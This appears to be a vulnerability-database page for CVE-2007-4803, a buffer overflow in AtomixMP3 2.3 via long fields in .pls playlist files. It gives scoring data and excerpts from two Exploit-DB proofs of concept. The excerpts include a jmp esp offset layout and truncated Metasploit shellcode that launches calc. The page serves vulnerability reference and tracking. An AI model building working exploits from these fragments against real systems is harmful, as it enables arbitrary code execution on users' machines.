CVE-2007-4803
published 2007-09-11CVE-2007-4803: Buffer overflow in AtomixMP3 2.3 allows user-assisted remote attackers to execute arbitrary code via long strings in file and title fields in a .pls file, as…
PriorityP427medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
3.89%
88.9th percentile
Buffer overflow in AtomixMP3 2.3 allows user-assisted remote attackers to execute arbitrary code via long strings in file and title fields in a .pls file, as demonstrated by the (1) File1 and (2) Title1 fields, different vectors than CVE-2006-6287 and CVE-2007-2487.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atomix_productions | atomixmp3 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)
exploitdb·2009-03-30
CVE-2007-4803 AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)
AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)
---
#usage: exploit.py
# [+] Bug: AtomixMP3 <= 2.3 (playlist) Universal Seh Overwrite Exploit
# [+] Exploit by : His0k4
# [+] Software download : http://download.atomixmp3.com/atomixmp3_trial.exe
# [+] Greetings : All friends & muslims HackErS (DZ), secdz.com
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e
Exploit-DB
AtomixMP3 2.3 - '.pls' Local Buffer Overflow
exploitdb·2007-09-05
CVE-2007-4803 AtomixMP3 2.3 - '.pls' Local Buffer Overflow
AtomixMP3 2.3 - '.pls' Local Buffer Overflow
---
0x77394540 jmp esp in mswsock.dll Winxp Pro Version 2002
exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ]
By : 0x58
greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Metasploit
Moroccan Hackers !
*/
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84".
"\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d".
"\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91".
"\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5".
"\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe".
"\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc".
"\x80\x12\xcf\x18\xe
No writeups or analysis indexed.
2007-09-11
Published